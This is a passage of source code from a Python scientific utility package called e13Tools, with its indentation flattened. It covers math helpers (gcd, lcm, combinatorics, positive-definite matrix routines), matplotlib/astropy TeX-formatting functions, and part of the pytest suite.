Example
-------
>>> gcd_single(42, 56)
14
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
:func:`~lcm`
Least common multiple for sequence of integers.
:func:`~core.lcm_single`
Least common multiple for two integers.
"""
while(b):
a, b = b, a % b
return(a)
# This function determines if a matrix is positive-definite
def is_PD(matrix):
"""
Checks if `matrix` is positive-definite or not, by using the
:func:`~numpy.linalg.cholesky` function. It is required for `matrix` to be
Hermitian.
Parameters
----------
matrix : 2D array_like
Matrix that requires checking.
Returns
-------
out: bool
*True* if `matrix` is positive-definite, *False* if it is not.
Examples
--------
Using a real matrix that is positive-definite (like the identity matrix):
>>> matrix = np.eye(3)
>>> matrix
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
>>> is_PD(matrix)
True
Using a real matrix that is not symmetric (Hermitian):
>>> matrix = np.array([[1, 2], [3, 4]])
>>> matrix
array([[1, 2],
[3, 4]])
>>> is_PD(matrix)
Traceback (most recent call last):
...
ValueError: Input argument 'matrix' must be Hermitian!
Using a complex matrix that is positive-definite:
>>> matrix = np.array([[4, 1.5+1j], [1.5-1j, 3]])
>>> matrix
array([[ 4.0+0.j, 1.5+1.j],
[ 1.5-1.j, 3.0+0.j]])
>>> is_PD(matrix)
True
See also
--------
:func:`~nearest_PD`
Find the nearest positive-definite matrix to the input `matrix`.
"""
# Make sure that matrix is a numpy array
matrix = np.asarray(matrix)
# Check if input is a matrix
if(matrix.ndim != 2):
raise ShapeError("Input argument 'matrix' must be two-dimensional!")
else:
rows, columns = matrix.shape
# Check if matrix is a square
if(rows != columns):
raise ShapeError("Input argument 'matrix' has shape [%s, %s]. 'matrix'"
" must be a square matrix!" % (rows, columns))
# Check if matrix is Hermitian
if not np.allclose(transposeC(matrix), matrix):
raise ValueError("Input argument 'matrix' must be Hermitian!")
# Try to use Cholesky on matrix. If it fails,
try:
cholesky(matrix)
except LinAlgError:
return(False)
else:
return(True)
# This function calculates the least common multiple of a sequence
def lcm(*args):
"""
Returns the least common multiple of the provided sequence of integers.
If at least one integer is zero, the output will also be zero.
Parameters
----------
args : tuple of int
Integers to calculate the least common multiple for.
Returns
-------
lcm : int
Least common multiple of input integers.
Example
-------
>>> lcm(8, 9, 21)
504
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
"""
return(reduce(lcm_single, args))
# This function calculates the least common multiple of two integers
def lcm_single(a, b):
"""
Returns the least common multiple of the integers `a` and `b`.
If at least one integer is zero, the output will also be zero.
Parameters
----------
a, b : int
The two integers to calculate the least common multiple for.
Returns
-------
lcm : int
Least common multiple of `a` and `b`.
Notes
-----
The least common multiple of two given integers :math:`a` and :math:`b` is
given by
.. math:: \\mathrm{lcm}(a, b)=\\frac{|a\\cdot b|}{\\mathrm{gcd}(a, b)},
which can also be written as
.. math:: \\mathrm{lcm}(a, b)=\\frac{|a|}{\\mathrm{gcd}(a, b)}\\cdot \
|b|,
with :math:`\\mathrm{gcd}` being the greatest common divisor.
Example
-------
>>> lcm_single(6, 21)
42
See also
--------
:func:`~gcd`
Greatest common divisor for sequence of integers.
:func:`~core.gcd_single`
Greatest common divisor for two integers.
:func:`~lcm`
Least common multiple for sequence of integers.
"""
return(0 if(a == 0 or b == 0) else (abs(a)//gcd_single(a, b))*abs(b))
# This function calculates the number of unordered arrangements
def nCr(n, r, repeat=False):
"""
For a given set S of `n` elements, returns the number of unordered
arrangements ("combinations") of length `r` one can make with S.
Returns zero if `r` > `n` and `repeat` is *False*.
Parameters
----------
n : int
Number of elements in the set S.
r : int
Number of elements in the sub-set of set S.
Optional
--------
repeat : bool. Default: False
If *False*, each element in S can only be chosen once.
If *True*, they can be chosen more than once.
Returns
-------
n_comb : int
Number of "combinations" that can be made with S.
Examples
--------
>>> nCr(4, 2)
6
>>> nCr(4, 2, repeat=True)
10
>>> nCr(2, 4, repeat=True)
5
>>> nCr(2, 4)
0
See also
--------
:func:`~nPr`
Returns the number of ordered arrangements.
"""
# Check if repeat is True or not and act accordingly
if(r == 0):
return(1)
elif(r == 1):
return(n)
elif repeat:
return(factorial(n+r-1)//(factorial(r)*factorial(n-1)))
elif(r == n-1):
return(n)
elif(r == n):
return(1)
elif(r > n):
return(0)
else:
return(factorial(n)//(factorial(r)*factorial(n-r)))
# This function converts a given matrix to its nearest PD variant
def nearest_PD(matrix):
"""
Find the nearest positive-definite matrix to the input `matrix`.
Parameters
----------
matrix : 2D array_like
Input matrix that requires its nearest positive-definite variant.
Returns
-------
mat_PD : 2D :obj:`~numpy.ndarray` object
The nearest positive-definite matrix to the input `matrix`.
Notes
-----
This is a Python port of <NAME>'s *nearestSPD* code [1]_, which is a
MATLAB implementation of Higham (1988) [2]_.
According to Higham (1988), the nearest positive semi-definite matrix in
the Frobenius norm to an arbitrary real matrix :math:`A` is shown to be
.. math:: \\frac{B+H}{2},
with :math:`H` being the symmetric polar factor of
.. math:: B=\\frac{A+A^T}{2}.
On page 2, the author mentions that all matrices :math:`A` are assumed to
be real, but that the method can be very easily extended to the complex
case. This can indeed be done easily by taking the conjugate transpose
    instead of the normal transpose in the formula above.
References
----------
.. [1] \
https://www.mathworks.com/matlabcentral/fileexchange/42885-nearestspd
.. [2] <NAME>, "Computing a Nearest Symmetric Positive Semidefinite
Matrix" (1988): https://doi.org/10.1016/0024-3795(88)90223-6
Examples
--------
Requesting the nearest PD variant of a matrix that is already PD results
in it being returned immediately:
>>> matrix = np.eye(3)
>>> matrix
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
>>> is_PD(matrix)
True
>>> nearest_PD(matrix)
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
Using a real non-PD matrix results in it being transformed into an
PD-matrix:
>>> matrix = np.array([[1, 2], [3, 4]])
>>> matrix
array([[1, 2],
[3, 4]])
>>> is_PD(matrix)
Traceback (most recent call last):
...
ValueError: Input argument 'matrix' must be Hermitian!
>>> mat_PD = nearest_PD(matrix)
>>> mat_PD
array([[ 1.31461828, 2.32186616],
[ 2.32186616, 4.10085767]])
>>> is_PD(mat_PD)
True
Using a complex non-PD matrix converts it into the nearest complex
PD-matrix:
>>> matrix = np.array([[4, 2+1j], [1+3j, 3]])
>>> matrix
array([[ 4.+0.j, 2.+1.j],
[ 1.+3.j, 3.+0.j]])
>>> mat_PD = nearest_PD(matrix)
>>> mat_PD
array([[ 4.0+0.j, 1.5-1.j],
[ 1.5+1.j, 3.0+0.j]])
>>> is_PD(mat_PD)
True
See also
--------
:func:`~is_PD`
Checks if `matrix` is positive-definite or not.
"""
# Make sure that matrix is a numpy array
matrix = np.asarray(matrix)
# Check if input is a matrix
if(matrix.ndim != 2):
raise ShapeError("Input argument 'matrix' must be two-dimensional!")
else:
rows, columns = matrix.shape
# Check if matrix is a square
if(rows != columns):
raise ShapeError("Input argument 'matrix' has shape [%s, %s]. 'matrix'"
" must be a square matrix!" % (rows, columns))
# Check if matrix is not already positive-definite
try:
is_PD(matrix)
except ValueError:
pass
else:
if is_PD(matrix):
return(matrix)
# Make sure that the matrix is Hermitian
mat_H = (matrix+transposeC(matrix))/2
# Perform singular value decomposition
_, S, VH = svd(mat_H)
# Compute the symmetric polar factor of mat_H
spf = np.dot(transposeC(VH), np.dot(np.diag(S), VH))
# Obtain the positive-definite matrix candidate
mat_PD = (mat_H+spf)/2
# Ensure that mat_PD is Hermitian
mat_PD = (mat_PD+transposeC(mat_PD))/2
# Check if mat_PD is in fact positive-definite
if is_PD(mat_PD):
return(mat_PD)
# If it is not, change it very slightly to make it positive-definite
In = np.eye(rows)
k = 1
spacing = np.spacing(norm(matrix))
while not is_PD(mat_PD):
min_eig_val = np.min(np.real(eigvals(mat_PD)))
mat_PD += In*(-1*min_eig_val*pow(k, 2)+spacing)
k += 1
else:
return(mat_PD)
# This function calculates the number of ordered arrangements
def nPr(n, r, repeat=False):
"""
For a given set S of `n` elements, returns the number of ordered
arrangements ("permutations") of length `r` one can make with S.
Returns zero if `r` > `n` and `repeat` is *False*.
Parameters
----------
n : int
Number of elements in the set S.
r : int
Number of elements in the sub-set of set S.
Optional
--------
repeat : bool. Default: False
If *False*, each element in S can only be chosen once.
If *True*, they can be chosen more than once.
Returns
-------
n_perm : int
Number of "permutations" that can be made with S.
Examples
--------
>>> nPr(4, 2)
12
>>> nPr(4, 2, repeat=True)
16
>>> nPr(2, 4, repeat=True)
16
>>> nPr(2, 4)
0
See also
--------
:func:`~nCr`
Returns the number of unordered arrangements.
"""
# Check if repeat is True or not and act accordingly
if(r == 0):
return(1)
elif(r == 1):
return(n)
elif repeat:
return(pow(n, r))
elif(r > n):
return(0)
else:
return(factorial(n)//factorial(n-r))
```
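A quick usage sketch of the helpers above; the values mirror the docstring examples and assume the package is installed as `e13tools`:
```python
import numpy as np
from e13tools.math import gcd, lcm, nCr, nPr, is_PD, nearest_PD

print(gcd(18, 60, 72, 138))   # 6
print(lcm(8, 9, 21))          # 504
print(nCr(4, 2), nPr(4, 2))   # 6 12

# A non-Hermitian real matrix cannot be PD; nearest_PD() returns the closest PD approximation.
matrix = np.array([[1, 2], [3, 4]])
mat_PD = nearest_PD(matrix)
print(is_PD(mat_PD))          # True
```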
#### File: e13Tools/e13tools/pyplot.py
```python
try:
import astropy.units as apu
import_astropy = 1
except ImportError: # pragma: no cover
import_astropy = 0
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import transforms
import numpy as np
# e13Tools imports
from e13tools.core import InputError
# All declaration
__all__ = ['apu2tex', 'center_spines', 'draw_textline', 'f2tex', 'q2tex']
# %% FUNCTIONS
# This function converts an astropy unit into a TeX string
def apu2tex(unit, unitfrac=False):
"""
Transform a :obj:`~astropy.units.Unit` object into a (La)TeX string for
usage in a :obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
unit : :obj:`~astropy.units.Unit` object
Unit to be transformed.
Optional
--------
unitfrac : bool. Default: False
Whether or not to write `unit` as a LaTeX fraction.
Returns
-------
out : string
String containing `unit` written in (La)TeX string.
Examples
--------
>>> import astropy.units as apu
>>> apu2tex(apu.solMass)
'\\mathrm{M_{\\odot}}'
>>> import astropy.units as apu
>>> apu2tex(apu.solMass/apu.yr, unitfrac=False)
'\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> import astropy.units as apu
>>> apu2tex(apu.solMass/apu.yr, unitfrac=True)
'\\mathrm{\\frac{M_{\\odot}}{yr}}'
"""
if import_astropy:
if not unitfrac:
string = unit.to_string('latex_inline')
else:
string = unit.to_string('latex')
# Remove '$' from the string and make output a string (py2.7)
return(str(string.replace("$", "")))
else: # pragma: no cover
raise ImportError("This function requires AstroPy!")
# This function centers the axes of the provided axes
def center_spines(centerx=0, centery=0, set_xticker=False, set_yticker=False,
ax=None):
"""
Centers the axis spines at <`centerx`, `centery`> on the axis `ax` in a
:obj:`~matplotlib.figure.Figure` instance. Centers the axis spines at the
origin by default.
Optional
--------
centerx : int or float. Default: 0
Centers x-axis at value `centerx`.
centery : int or float. Default: 0
Centers y-axis at value `centery`.
set_xticker : int, float or False. Default: False
If int or float, sets the x-axis ticker to `set_xticker`.
If *False*, let :obj:`~matplotlib.figure.Figure` instance decide.
set_yticker : int, float or False. Default: False
If int or float, sets the y-axis ticker to `set_yticker`.
If *False*, let :obj:`~matplotlib.figure.Figure` instance decide.
ax : :obj:`~matplotlib.axes.Axes` object or None. Default: None
If :obj:`~matplotlib.axes.Axes` object, centers the axis spines
of specified :obj:`~matplotlib.figure.Figure` instance.
If *None*, centers the axis spines of current
:obj:`~matplotlib.figure.Figure` instance.
"""
# If no AxesSubplot object is provided, make one
if ax is None:
ax = plt.gca()
# Set the axis's spines to be centered at the given point
# (Setting all 4 spines so that the tick marks go in both directions)
ax.spines['left'].set_position(('data', centerx))
ax.spines['bottom'].set_position(('data', centery))
ax.spines['right'].set_position(('data', centerx))
ax.spines['top'].set_position(('data', centery))
# Hide the line (but not ticks) for "extra" spines
for side in ['right', 'top']:
ax.spines[side].set_color('none')
# On both the x and y axes...
for axis, center in zip([ax.xaxis, ax.yaxis], [centerx, centery]):
# TODO: STILL HAVE TO FIX THAT THE TICKLABELS ARE ALWAYS HIDDEN
# Hide the ticklabels at <centerx, centery>
formatter = mpl.ticker.ScalarFormatter()
formatter.center = center
axis.set_major_formatter(formatter)
# Add origin offset ticklabel if <centerx=0, centery=0> using annotation
if(centerx == 0 and centery == 0):
xlabel, ylabel = map(formatter.format_data, [centerx, centery])
ax.annotate("0", (centerx, centery), xytext=(-4, -4),
textcoords='offset points', ha='right', va='top')
# Set x-axis ticker
if set_xticker:
ax.xaxis.set_major_locator(mpl.ticker.MultipleLocator(set_xticker))
# Set y-axis ticker
if set_yticker:
ax.yaxis.set_major_locator(mpl.ticker.MultipleLocator(set_yticker))
# This function draws a line with text in the provided figure
def draw_textline(text, *, x=None, y=None, pos='start top', ax=None,
line_kwargs={}, text_kwargs={}):
"""
Draws a line on the axis `ax` in a :obj:`~matplotlib.figure.Figure`
instance and prints `text` on top.
Parameters
----------
text : str
Text to be printed on the line.
x : scalar or None
If scalar, text/line x-coordinate.
If *None*, line covers complete x-axis.
Either `x` or `y` needs to be *None*.
y : scalar or None
If scalar, text/line y-coordinate.
If *None*, line covers complete y-axis.
Either `x` or `y` needs to be *None*.
Optional
--------
pos : {'start', 'end'}{'top', 'bottom'}. Default: 'start top'
If 'start', prints the text at the start of the drawn line.
If 'end', prints the text at the end of the drawn line.
If 'top', prints the text above the drawn line.
If 'bottom', prints the text below the drawn line.
Arguments must be given as a single string.
ax : :obj:`~matplotlib.axes.Axes` object or None. Default: None
If :obj:`~matplotlib.axes.Axes` object, draws line in specified
:obj:`~matplotlib.figure.Figure` instance.
If *None*, draws line in current :obj:`~matplotlib.figure.Figure`
instance.
line_kwargs : dict of :class:`~matplotlib.lines.Line2D` properties.\
Default: {}
The keyword arguments used for drawing the line.
text_kwargs : dict of :class:`~matplotlib.text.Text` properties.\
Default: {}
The keyword arguments used for drawing the text.
"""
# If no AxesSubplot object is provided, make one
if ax is None:
ax = plt.gca()
# Convert pos to lowercase
pos = pos.lower()
# Set default line_kwargs and text_kwargs
default_line_kwargs = {'linestyle': '-',
'color': 'k'}
default_text_kwargs = {'color': 'k',
'fontsize': 14}
# Combine given kwargs with default ones
default_line_kwargs.update(line_kwargs)
default_text_kwargs.update(text_kwargs)
line_kwargs = default_line_kwargs
text_kwargs = default_text_kwargs
    # Remove keyword arguments from text_kwargs that are set explicitly below
text_keys = list(text_kwargs.keys())
for key in text_keys:
if key in ('va', 'ha', 'verticalalignment', 'horizontalalignment',
'rotation', 'transform', 'x', 'y', 's'):
text_kwargs.pop(key)
# Set line specific variables
if x is None and y is not None:
ax.axhline(y, **line_kwargs)
elif x is not None and y is None:
ax.axvline(x, **line_kwargs)
else:
        raise InputError("Exactly one of the input arguments 'x' and 'y' "
                         "needs to be *None*!")
# Gather case specific text properties
if ('start') in pos and ('top') in pos:
ha = 'left' if x is None else 'right'
va = 'bottom'
other_axis = 0
elif ('start') in pos and ('bottom') in pos:
ha = 'left'
va = 'top' if x is None else 'bottom'
other_axis = 0
elif ('end') in pos and ('top') in pos:
ha = 'right'
va = 'bottom' if x is None else 'top'
other_axis = 1
elif ('end') in pos and ('bottom') in pos:
ha = 'right' if x is None else 'left'
va = 'top'
other_axis = 1
else:
raise ValueError("Input argument 'pos' is invalid!")
# Set proper axes and rotation
if x is None:
x = other_axis
rotation = 0
transform = transforms.blended_transform_factory(
ax.transAxes, ax.transData)
else:
y = other_axis
rotation = 90
transform = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
# Draw text
ax.text(x, y, text, rotation=rotation, ha=ha, va=va,
transform=transform, **text_kwargs)
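# Hedged usage sketch (editor's addition): draws a labeled horizontal
# threshold line on an existing axes `ax`; the y-value and label text below
# are made up for illustration.
#     draw_textline("upper limit", y=0.5, pos='end top', ax=ax,
#                   line_kwargs={'linestyle': '--'},
#                   text_kwargs={'fontsize': 10})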
# This function converts a float into a TeX string
def f2tex(value, *errs, sdigits=4, power=3, nobase1=True):
"""
Transform a value into a (La)TeX string for usage in a
:obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
value : int or float
Value to be transformed.
Optional
--------
errs : int or float
The upper and lower :math:`1\\sigma`-errors of the given `value`.
If only a single value is given, `value` is assumed to have a centered
error interval of `errs`.
sdigits : int. Default: 4
Number of significant digits any value is returned with.
power : int. Default: 3
Minimum abs(log10(`value`)) required before all values are written in
scientific form.
This value is ignored if `sdigits` forces scientific form to (not) be
used.
nobase1 : bool. Default: True
Whether or not to include `base` in scientific form if `base=1`.
This is always *False* if `errs` contains at least one value.
Returns
-------
out : string
String containing `value` and `errs` written in (La)TeX string.
Examples
--------
>>> f2tex(20.2935826592)
'20.29'
>>> f2tex(20.2935826592, sdigits=6)
'20.2936'
>>> f2tex(20.2935826592, power=1)
'2.029\\cdot 10^{1}'
>>> f2tex(1e6, nobase1=True)
'10^{6}'
>>> f2tex(1e6, nobase1=False)
'1.000\\cdot 10^{6}'
>>> f2tex(20.2935826592, 0.1)
'20.29\\pm 0.10'
>>> f2tex(20.2935826592, 0.1, 0.2)
'20.29^{+0.10}_{-0.20}'
>>> f2tex(1e6, 12, 10)
'1.000^{+0.000}_{-0.000}\\cdot 10^{6}'
>>> f2tex(1e6, 12, 10, sdigits=6)
'1.000^{+0.000}_{-0.000}\\cdot 10^{6}'
"""
# Collect value and errs together
vals = [value, *map(abs, errs)]
# If vals contains more than 1 value, set nobase1 to False
if(len(vals) > 1):
nobase1 = False
# Calculate the maximum power required for all values
    n = [int(np.floor(np.log10(abs(v)))) if v else -np.inf for v in vals]
n_max = max(n)
# Check that n_max is a valid value
    if(n_max == -np.inf):
sdigits = 0
n_max = 0
# If there are no significant digits requested, never use scientific form
if not sdigits:
power = None
# Else, if n_max >= sdigits, always use scientific form
elif(n_max >= sdigits):
power = 0
# Create empty list of string representations
strings = []
# Convert all values into their proper string representations
for v, ni in zip(vals, n):
# Calculate the number of significant digits each value should have
sd = sdigits-(n_max-ni)
# If the sd is zero or -infinity
if(sd <= 0):
# Then v must always be zero
v *= 0.
sd = max(0, sdigits-n_max)
# If no power is required, create string without scientific form
if power is None or (abs(n_max) < power):
strings.append(r"{0:#.{1}g}".format(v, sd))
pow_str = ""
# Else, convert value to scientific form
else:
# If v is zero, set sd to the maximum number of significant digits
if not v:
sd = sdigits
# Calculate the base value
base = v/pow(10, n_max)
# Determine string representation
if(base == 1) and nobase1:
strings.append(r"10^{{{0}}}".format(n_max))
pow_str = ""
else:
strings.append(r"{0:#.{1}g}".format(base, sd))
pow_str = r"\cdot 10^{{{0}}}".format(n_max)
# Check contents of strings and convert accordingly
if(len(strings) == 1):
fmt = r"{0}{1}"
elif(len(strings) == 2):
fmt = r"{0}\pm {1}{2}"
else:
fmt = r"{0}^{{+{1}}}_{{-{2}}}{3}"
# Return string
return(fmt.format(*strings, pow_str))
# This function converts an astropy quantity into a TeX string
def q2tex(quantity, *errs, sdigits=4, power=3, nobase1=True, unitfrac=False):
"""
Combination of :func:`~e13tools.pyplot.f2tex` and
:func:`~e13tools.pyplot.apu2tex`.
Transform a :obj:`~astropy.units.quantity.Quantity` object into a (La)TeX
string for usage in a :obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
quantity : int, float or :obj:`~astropy.units.quantity.Quantity` object
Quantity to be transformed.
Optional
--------
errs : int, float or :obj:`~astropy.units.quantity.Quantity` object
The upper and lower :math:`1\\sigma`-errors of the given `quantity`.
If only a single value is given, `quantity` is assumed to have a
centered error interval of `errs`.
The unit of `errs` must be convertible to the unit of `quantity`.
sdigits : int. Default: 4
Maximum amount of significant digits any quantity is returned with.
power : int. Default: 3
Minimum abs(log10(`value`)) required before all quantities are written
in scientific form.
This value is ignored if `sdigits` forces scientific form to (not) be
used.
nobase1 : bool. Default: True
Whether or not to include `base` in scientific form if `base=1`.
This is always *False* if `errs` contains a value.
unitfrac : bool. Default: False
Whether or not to write `unit` as a LaTeX fraction.
Returns
-------
out : string
String containing `quantity` and `errs` written in (La)TeX string.
Examples
--------
>>> import astropy.units as apu
>>> q2tex(20.2935826592)
'20.29'
>>> q2tex(20.2935826592*apu.kg, 1500*apu.g)
'20.29\\pm 1.50\\,\\mathrm{kg}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr)
'20.29\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, sdigits=6)
'20.2936\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, power=1)
'2.029\\cdot 10^{1}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(1e6*apu.solMass/apu.yr, nobase1=True)
'10^{6}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(1e6*apu.solMass/apu.yr, nobase1=False)
'1.000\\cdot 10^{6}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, unitfrac=False)
'20.29\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass, 1*apu.solMass, unitfrac=True)
'20.29\\pm 1.00\\,\\mathrm{M_{\\odot}}'
"""
# Collect quantity and errs together
qnts = [quantity, *errs]
# If astropy is importable, check if there are quantities
if import_astropy:
# Make empty lists of values and units
values = []
units = []
# Loop over all quantities given and split them up into value and unit
for q in qnts:
if isinstance(q, apu.quantity.Quantity):
values.append(q.value)
units.append(q.unit)
else:
values.append(q)
units.append(apu.dimensionless_unscaled)
# Obtain the unit of the main value
unit = units[0]
# Loop over the errors
for i, u in enumerate(units[1:], 1):
# Try to convert the error quantity to have the same unit as main
try:
values[i] *= u.to(unit)
# If this fails, raise error
except apu.UnitConversionError:
raise ValueError("Input argument 'errs[{}]' (unit: {!r}; {}) "
"cannot be converted to the same unit as "
"'quantity' (unit: {!r}; {})!".format(
i-1, str(u), u.physical_type,
str(unit), unit.physical_type))
# Value handling
string = f2tex(*values, sdigits=sdigits, power=power, nobase1=nobase1)
# Unit handling
if(unit.physical_type != 'dimensionless'):
unit_string = apu2tex(unit, unitfrac=unitfrac)
string = ''.join([string, r'\,', unit_string])
# Return string
return(string)
# Else, handle given arguments as normal values
else: # pragma: no cover
return(f2tex(*qnts, sdigits=sdigits, power=power, nobase1=nobase1))
```
#### File: e13tools/tests/test_core.py
```python
import sys
# e13Tools imports
import e13tools.core as e13c
# %% PYTEST FUNCTIONS
def test_InputError():
assert Exception in e13c.InputError.mro()
try:
raise e13c.InputError
except Exception:
assert sys.exc_info()[0] == e13c.InputError
def test_ShapeError():
assert Exception in e13c.ShapeError.mro()
try:
raise e13c.ShapeError
except Exception:
assert sys.exc_info()[0] == e13c.ShapeError
def test_compare_version():
assert e13c.compare_versions('0.1.1', '0.1.0')
assert not e13c.compare_versions('0.1.0a0', '0.1.0')
assert not e13c.compare_versions('0.0.9', '0.1.0')
assert e13c.compare_versions('1.0.0', '0.1.0')
assert not e13c.compare_versions(None, '0.1.0')
```
#### File: e13tools/tests/test_utils.py
```python
import logging
from inspect import currentframe
# Package imports
import numpy as np
import pytest
# e13Tools imports
from e13tools.core import InputError
from e13tools.utils import (
add_to_all, docstring_append, docstring_copy, docstring_substitute,
check_instance, delist, get_main_desc, get_outer_frame, raise_error,
raise_warning, split_seq, unpack_str_seq)
# %% CUSTOM CLASSES
# Define test class for get_outer_frame function testing
class _Test(object):
def __init__(self):
self._test()
def _test(self):
_test2(self)
def _test2(instance):
get_outer_frame(instance.__init__)
# Create function to be added to module's __all__
@add_to_all
def add_to_all_test():
pass
# Define custom class for check_instance test
class CustomClass(object):
def __init__(self):
self._prop = True
@property
def prop(self):
return(self._prop)
# Custom class that inherits incorrectly from CustomClass
class CustomSubClass(CustomClass):
def __init__(self, *args, **kwargs):
pass
# %% PYTEST CLASSES AND FUNCTIONS
# Pytest for the add_to_all decorator
class Test_add_to_all(object):
# Test if function was added successfully
def test_function_add(self):
assert globals().get('__all__') == ['add_to_all_test']
# Test if trying to add an object raises an error
def test_add_no_name(self):
obj = []
with pytest.raises(AttributeError):
add_to_all(obj)
# Pytest for the custom function decorators
class TestDecorators(object):
# Create method with no docstring that is appended
@docstring_append("appended")
def append_method1(self):
pass
# Create method with a docstring that is appended
@docstring_append("appended")
def append_method2(self):
"""original """
# Create method with a docstring that is appended from another
@docstring_append(append_method1)
def append_method3(self):
"""original """
# Create old-style class with no docstring that is appended
@docstring_append("appended")
class append_old_class1:
pass
# Create old-style class with a docstring that is appended
@docstring_append("appended")
class append_old_class2:
"""original """
# Create new-style class with no docstring that is appended
@docstring_append("appended")
class append_new_class1(object):
pass
# Create new-style class with a docstring that is appended
@docstring_append("appended")
class append_new_class2(object):
"""original """
# Check if docstring_append works correctly
def test_docstring_append(self):
assert self.append_method1.__doc__ == "appended"
assert self.append_method2.__doc__ == "original appended"
assert self.append_method3.__doc__ == "original appended"
assert self.append_old_class1.__doc__ == "appended"
assert self.append_old_class2.__doc__ == "original appended"
assert self.append_new_class1.__doc__ == "appended"
assert self.append_new_class2.__doc__ == "original appended"
assert self.append_new_class1.__name__ == 'append_new_class1'
assert self.append_new_class1.__module__ != 'e13tools.utils'
assert self.append_new_class2.__name__ == 'append_new_class2'
assert self.append_new_class2.__module__ != 'e13tools.utils'
# Create method with no docstring at all
def empty_method(self):
pass
# Create new-style class with no docstring at all
class empty_class(object):
pass
# Create method that copies an empty docstring
@docstring_copy(empty_method)
def copy_method1(self):
pass
# Create method that copies a docstring
@docstring_copy(append_method2)
def copy_method2(self):
pass
# Create old-style class that copies an empty docstring
@docstring_copy(empty_class)
class copy_old_class1:
pass
# Create old-style class that copies a docstring
@docstring_copy(append_old_class2)
class copy_old_class2:
pass
# Create new-style class that copies an empty docstring
@docstring_copy(empty_class)
class copy_new_class1(object):
pass
# Create new-style class that copies a docstring
@docstring_copy(append_new_class2)
class copy_new_class2(object):
pass
# Check if docstring_copy works correctly
def test_docstring_copy(self):
assert self.copy_method1.__doc__ is None
assert self.copy_method1.__doc__ == self.empty_method.__doc__
assert self.copy_method2.__doc__ == self.append_method2.__doc__
assert self.copy_old_class1.__doc__ is None
assert self.copy_old_class1.__doc__ == self.empty_class.__doc__
assert self.copy_old_class2.__doc__ == self.append_old_class2.__doc__
assert self.copy_new_class1.__doc__ is None
assert self.copy_new_class1.__doc__ == self.empty_class.__doc__
assert self.copy_new_class2.__doc__ == self.append_new_class2.__doc__
assert self.copy_new_class1.__name__ == 'copy_new_class1'
assert self.copy_new_class1.__module__ != 'e13tools.utils'
assert self.copy_new_class2.__name__ == 'copy_new_class2'
assert self.copy_new_class2.__module__ != 'e13tools.utils'
# Check if providing both args and kwargs raises an error, method
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
def substitute_method1(self):
pass
# Check if providing both args and kwargs raises an error, old-style class
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
class substitute_old_class1:
pass
# Check if providing both args and kwargs raises an error, new-style class
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
class substitute_new_class1(object):
pass
# Create method using args substitutes with %
@docstring_substitute("positional")
def substitute_method2(self):
"""%s"""
# Create method using kwargs substitutes with %
@docstring_substitute(x="keyword")
def substitute_method3(self):
"""%(x)s"""
# Create method using args substitutes with .format
@docstring_substitute("positional")
def substitute_method4(self):
"""{}"""
# Create method using kwargs substitutes with .format
@docstring_substitute(x="keyword")
def substitute_method5(self):
"""{x}"""
# Create old-style class using args substitutes with %
@docstring_substitute("positional")
class substitute_old_class2:
"""%s"""
# Create old-style class using kwargs substitutes with %
@docstring_substitute(x="keyword")
class substitute_old_class3:
"""%(x)s"""
# Create old-style class using args substitutes with .format
@docstring_substitute("positional")
class substitute_old_class4:
"""{}"""
# Create old-style class using kwargs substitutes with .format
@docstring_substitute(x="keyword")
class substitute_old_class5:
"""{x}"""
# Create new-style class using args substitutes with %
@docstring_substitute("positional")
class substitute_new_class2(object):
"""%s"""
# Create new-style class using kwargs substitutes with %
@docstring_substitute(x="keyword")
class substitute_new_class3(object):
"""%(x)s"""
# Create new-style class using args substitutes with .format
@docstring_substitute("positional")
class substitute_new_class4(object):
"""{}"""
# Create new-style class using kwargs substitutes with .format
@docstring_substitute(x="keyword")
class substitute_new_class5(object):
"""{x}"""
# Check if providing args to a method with no docstring raises an error
with pytest.raises(InputError):
@docstring_substitute("positional")
def substitute_method6(self):
pass
# Check providing args to an old_style class with no docstring
with pytest.raises(InputError):
@docstring_substitute("positional")
class substitute_old_class6:
pass
# Check providing args to a new_style class with no docstring
with pytest.raises(InputError):
@docstring_substitute("positional")
class substitute_new_class6(object):
pass
# Check if combining % and .format can be done properly, method
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
def substitute_method7(self):
"""%s {x}"""
# Check if combining % and .format can be done properly, old-style class
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
class substitute_old_class7:
"""%s {x}"""
# Check if combining % and .format can be done properly, new-style class
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
class substitute_new_class7(object):
"""%s {x}"""
# Check if docstring_substitute works correctly
def test_docstring_substitute(self):
assert self.substitute_method2.__doc__ == "positional"
assert self.substitute_method3.__doc__ == "keyword"
assert self.substitute_method4.__doc__ == "positional"
assert self.substitute_method5.__doc__ == "keyword"
assert self.substitute_method7.__doc__ == "positional keyword"
assert self.substitute_old_class2.__doc__ == "positional"
assert self.substitute_old_class3.__doc__ == "keyword"
assert self.substitute_old_class4.__doc__ == "positional"
assert self.substitute_old_class5.__doc__ == "keyword"
assert self.substitute_old_class7.__doc__ == "positional keyword"
assert self.substitute_new_class2.__doc__ == "positional"
